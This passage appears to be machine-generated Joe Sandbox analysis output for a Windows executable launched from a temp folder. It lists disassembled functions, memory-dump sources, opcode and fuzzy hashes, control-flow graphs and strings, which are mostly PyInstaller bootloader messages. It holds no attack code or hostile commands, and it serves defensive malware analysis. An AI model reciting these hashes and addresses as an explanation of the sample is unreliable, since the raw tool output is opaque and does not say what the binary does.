                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                          • API String ID: 3580290477-2949737328
                                                                                                                                                                                                                          • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                          • Instruction ID: 00cee89e9188205b0c09c372a7abd0bbb4ff9d143a7c03cf147bfa893785b94c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B416C32A0CA5A85EB96FF25E4801BC27E4FB45790B955139EA4E83FD5DE3CE4838301
                                                                                                                                                                                                                          Function 00007FF641F3F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: .$:
                                                                                                                                                                                                                          • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                          • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                          • Instruction ID: 9a0a266e94677f041f47b7a6065f9902dff1bdebea9fe18153bf5699d0797a88
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1415D22F0DB5A98FB92BBB198501FC26E46F14358F540035DE4EA7EC9DF3894478312
                                                                                                                                                                                                                          Function 00007FF641F3BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                          • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                          • Instruction ID: 9e860f8f654d6aa1dd3b8555fdde8bb69d2b2d8c220c9f7d55a6f825ad27eb40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41C372A2CA8581DB61EF25E4443A9A7A0FB58794F404031EE4DC7B88EF3CD443C701
                                                                                                                                                                                                                          Function 00007FF641F3E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                          • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                          • Instruction ID: 10c14f154b33b72766d500d59fea21227e9352e208b416ee3cfc56f370116e80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E21A232B0C68981EBA2BB15D44427D63E1FB94B84F454035DA8D83AC6DF7CE947C742
                                                                                                                                                                                                                          Function 00007FF641F2F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                          • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                          • Instruction ID: c20293c4480933c1ad24b6f1ddc4560ad2bdfb9081ffcf7f96051365ce77a022
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2114C3662CB8482EB62AB25F54026977E4FB88B84F184230DF8D477A5DF3DC5528700
                                                                                                                                                                                                                          Function 00007FF641F3FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                          • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                          • Instruction ID: 6e545216d9e43f6d917ae23b03cf49d2cafd9a2c25b87cd50e4af7c5f5d1d31a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF014F21A2C64A86FBA6BF6094612BE67E0EF58708F840035D54DC7AD2DE7CE507CA16

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF641F21000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 7ff641f21000-7ff641f23536 call 7ff641f2f138 call 7ff641f2f140 call 7ff641f2bb70 call 7ff641f34700 call 7ff641f34794 call 7ff641f233e0 14 7ff641f23538-7ff641f2353f 0->14 15 7ff641f23544-7ff641f23566 call 7ff641f218f0 0->15 16 7ff641f2371a-7ff641f23735 call 7ff641f2b870 14->16 20 7ff641f23736-7ff641f2374c call 7ff641f23f70 15->20 21 7ff641f2356c-7ff641f23583 call 7ff641f21bf0 15->21 29 7ff641f2374e-7ff641f2377b call 7ff641f276a0 20->29 30 7ff641f23785-7ff641f2379a call 7ff641f225f0 20->30 25 7ff641f23588-7ff641f235c1 21->25 27 7ff641f235c7-7ff641f235cb 25->27 28 7ff641f23653-7ff641f2366d call 7ff641f27e10 25->28 32 7ff641f23638-7ff641f2364d call 7ff641f218e0 27->32 33 7ff641f235cd-7ff641f235e5 call 7ff641f34560 27->33 45 7ff641f2366f-7ff641f23675 28->45 46 7ff641f23695-7ff641f2369c 28->46 41 7ff641f2377d-7ff641f23780 call 7ff641f2f36c 29->41 42 7ff641f2379f-7ff641f237be call 7ff641f21bf0 29->42 47 7ff641f23712 30->47 32->27 32->28 50 7ff641f235e7-7ff641f235eb 33->50 51 7ff641f235f2-7ff641f2360a call 7ff641f34560 33->51 41->30 62 7ff641f237c1-7ff641f237ca 42->62 52 7ff641f23677-7ff641f23680 45->52 53 7ff641f23682-7ff641f23690 call 7ff641f3415c 45->53 54 7ff641f236a2-7ff641f236c0 call 7ff641f27e10 call 7ff641f27f80 46->54 55 7ff641f23844-7ff641f23863 call 7ff641f23e90 46->55 47->16 50->51 68 7ff641f23617-7ff641f2362f call 7ff641f34560 51->68 69 7ff641f2360c-7ff641f23610 51->69 52->53 53->46 76 7ff641f236c6-7ff641f236c9 54->76 77 7ff641f2380f-7ff641f2381e call 7ff641f28400 54->77 65 7ff641f23871-7ff641f23882 call 7ff641f21bf0 55->65 66 7ff641f23865-7ff641f2386f call 7ff641f23fe0 55->66 62->62 67 7ff641f237cc-7ff641f237e9 call 7ff641f218f0 62->67 79 7ff641f23887-7ff641f238a1 call 7ff641f286b0 65->79 66->79 67->25 86 7ff641f237ef-7ff641f23800 call 7ff641f225f0 67->86 68->32 82 7ff641f23631 68->82 69->68 76->77 83 7ff641f236cf-7ff641f236f6 call 7ff641f21bf0 76->83 93 7ff641f2382c-7ff641f23836 call 7ff641f27c40 77->93 94 7ff641f23820 77->94 95 7ff641f238af-7ff641f238c1 SetDllDirectoryW 79->95 96 7ff641f238a3 79->96 82->32 97 7ff641f236fc-7ff641f23703 call 7ff641f225f0 83->97 98 7ff641f23805-7ff641f2380d call 7ff641f3415c 83->98 86->47 93->79 111 7ff641f23838 93->111 94->93 100 7ff641f238d0-7ff641f238ec call 7ff641f26560 call 7ff641f26b00 95->100 101 7ff641f238c3-7ff641f238ca 95->101 96->95 108 7ff641f23708-7ff641f2370a 97->108 98->79 117 7ff641f23947-7ff641f2394a call 7ff641f26510 100->117 118 7ff641f238ee-7ff641f238f4 100->118 101->100 105 7ff641f23a50-7ff641f23a58 101->105 109 7ff641f23a5a-7ff641f23a77 PostMessageW GetMessageW 105->109 110 7ff641f23a7d-7ff641f23a92 call 7ff641f233d0 call 7ff641f23080 call 7ff641f233a0 105->110 108->47 109->110 128 7ff641f23a97-7ff641f23aaf call 7ff641f26780 call 7ff641f26510 110->128 111->55 125 7ff641f2394f-7ff641f23956 117->125 120 7ff641f238f6-7ff641f23903 call 7ff641f265a0 118->120 121 7ff641f2390e-7ff641f23918 call 7ff641f26970 118->121 120->121 133 7ff641f23905-7ff641f2390c 120->133 135 7ff641f2391a-7ff641f23921 121->135 136 7ff641f23923-7ff641f23931 call 7ff641f26cd0 121->136 125->105 130 7ff641f2395c-7ff641f23966 call 7ff641f230e0 125->130 130->108 143 7ff641f2396c-7ff641f23980 call 7ff641f283e0 130->143 138 7ff641f2393a-7ff641f23942 call 7ff641f22870 call 7ff641f26780 133->138 135->138 136->125 148 7ff641f23933 136->148 138->117 151 7ff641f23982-7ff641f2399f PostMessageW GetMessageW 143->151 152 7ff641f239a5-7ff641f239e8 call 7ff641f27f20 call 7ff641f27fc0 call 7ff641f26780 call 7ff641f26510 call 7ff641f27ec0 143->152 148->138 151->152 163 7ff641f239ea-7ff641f23a00 call 7ff641f281f0 call 7ff641f27ec0 152->163 164 7ff641f23a3d-7ff641f23a4b call 7ff641f218a0 152->164 163->164 171 7ff641f23a02-7ff641f23a10 163->171 164->108 172 7ff641f23a31-7ff641f23a38 call 7ff641f22870 171->172 173 7ff641f23a12-7ff641f23a2c call 7ff641f225f0 call 7ff641f218a0 171->173 172->164 173->108
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                          • API String ID: 514040917-585287483
                                                                                                                                                                                                                          • Opcode ID: 37299662909fd31b2dc1f19fb24c035a8bf2236558cf05c8c849e60866d03cca
                                                                                                                                                                                                                          • Instruction ID: ce4b8f7df4f6f8621b1c120936bdac7f041be9b197732ae72ec19b3cc8f6e948
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37299662909fd31b2dc1f19fb24c035a8bf2236558cf05c8c849e60866d03cca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F19F61B0C6C291FB9AFB21D6552F963E1AF98780F844032DA1DC36D6EF2DE55AC301
                                                                                                                                                                                                                          Function 00007FF641F44F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 245 7ff641f44f10-7ff641f44f4b call 7ff641f44898 call 7ff641f448a0 call 7ff641f44908 252 7ff641f44f51-7ff641f44f5c call 7ff641f448a8 245->252 253 7ff641f45175-7ff641f451c1 call 7ff641f39c10 call 7ff641f44898 call 7ff641f448a0 call 7ff641f44908 245->253 252->253 259 7ff641f44f62-7ff641f44f6c 252->259 278 7ff641f451c7-7ff641f451d2 call 7ff641f448a8 253->278 279 7ff641f452ff-7ff641f4536d call 7ff641f39c10 call 7ff641f40888 253->279 261 7ff641f44f8e-7ff641f44f92 259->261 262 7ff641f44f6e-7ff641f44f71 259->262 264 7ff641f44f95-7ff641f44f9d 261->264 263 7ff641f44f74-7ff641f44f7f 262->263 266 7ff641f44f8a-7ff641f44f8c 263->266 267 7ff641f44f81-7ff641f44f88 263->267 264->264 268 7ff641f44f9f-7ff641f44fb2 call 7ff641f3c90c 264->268 266->261 270 7ff641f44fbb-7ff641f44fc9 266->270 267->263 267->266 276 7ff641f44fca-7ff641f44fd6 call 7ff641f39c58 268->276 277 7ff641f44fb4-7ff641f44fb6 call 7ff641f39c58 268->277 286 7ff641f44fdd-7ff641f44fe5 276->286 277->270 278->279 288 7ff641f451d8-7ff641f451e3 call 7ff641f448d8 278->288 299 7ff641f4537b-7ff641f4537e 279->299 300 7ff641f4536f-7ff641f45376 279->300 286->286 289 7ff641f44fe7-7ff641f44ff8 call 7ff641f3f784 286->289 288->279 297 7ff641f451e9-7ff641f4520c call 7ff641f39c58 GetTimeZoneInformation 288->297 289->253 298 7ff641f44ffe-7ff641f45054 call 7ff641f497e0 * 4 call 7ff641f44e2c 289->298 314 7ff641f452d4-7ff641f452fe call 7ff641f44890 call 7ff641f44880 call 7ff641f44888 297->314 315 7ff641f45212-7ff641f45233 297->315 357 7ff641f45056-7ff641f4505a 298->357 301 7ff641f45380 299->301 302 7ff641f453b5-7ff641f453c8 call 7ff641f3c90c 299->302 305 7ff641f4540b-7ff641f4540e 300->305 307 7ff641f45383 301->307 324 7ff641f453ca 302->324 325 7ff641f453d3-7ff641f453ee call 7ff641f40888 302->325 306 7ff641f45414-7ff641f4541c call 7ff641f44f10 305->306 305->307 312 7ff641f45388-7ff641f453b4 call 7ff641f39c58 call 7ff641f2b870 306->312 307->312 313 7ff641f45383 call 7ff641f4518c 307->313 313->312 319 7ff641f4523e-7ff641f45245 315->319 320 7ff641f45235-7ff641f4523b 315->320 329 7ff641f45259 319->329 330 7ff641f45247-7ff641f4524f 319->330 320->319 327 7ff641f453cc-7ff641f453d1 call 7ff641f39c58 324->327 345 7ff641f453f0-7ff641f453f3 325->345 346 7ff641f453f5-7ff641f45407 call 7ff641f39c58 325->346 327->301 336 7ff641f4525b-7ff641f452cf call 7ff641f497e0 * 4 call 7ff641f41e6c call 7ff641f45424 * 2 329->336 330->329 338 7ff641f45251-7ff641f45257 330->338 336->314 338->336 345->327 346->305 359 7ff641f4505c 357->359 360 7ff641f45060-7ff641f45064 357->360 359->360 360->357 363 7ff641f45066-7ff641f4508b call 7ff641f35e68 360->363 369 7ff641f4508e-7ff641f45092 363->369 371 7ff641f450a1-7ff641f450a5 369->371 372 7ff641f45094-7ff641f4509f 369->372 371->369 372->371 374 7ff641f450a7-7ff641f450ab 372->374 376 7ff641f450ad-7ff641f450d5 call 7ff641f35e68 374->376 377 7ff641f4512c-7ff641f45130 374->377 385 7ff641f450d7 376->385 386 7ff641f450f3-7ff641f450f7 376->386 379 7ff641f45137-7ff641f45144 377->379 380 7ff641f45132-7ff641f45134 377->380 382 7ff641f45146-7ff641f4515c call 7ff641f44e2c 379->382 383 7ff641f4515f-7ff641f4516e call 7ff641f44890 call 7ff641f44880 379->383 380->379 382->383 383->253 389 7ff641f450da-7ff641f450e1 385->389 386->377 391 7ff641f450f9-7ff641f45117 call 7ff641f35e68 386->391 389->386 392 7ff641f450e3-7ff641f450f1 389->392 397 7ff641f45123-7ff641f4512a 391->397 392->386 392->389 397->377 398 7ff641f45119-7ff641f4511d 397->398 398->377 399 7ff641f4511f 398->399 399->397
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F55
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C19
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C3E
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F44
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                                                                          • Opcode ID: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                          • Instruction ID: 570ae5e0368421c130c17b1d4fac710b277ddf00b0f25bcdca49e0b69b77a866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BD1AF26A0C64286EBA2FF26D6411B967E1FFA4794F444035EA0DC7AE6DE3CE443C740
                                                                                                                                                                                                                          Function 00007FF641F45C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
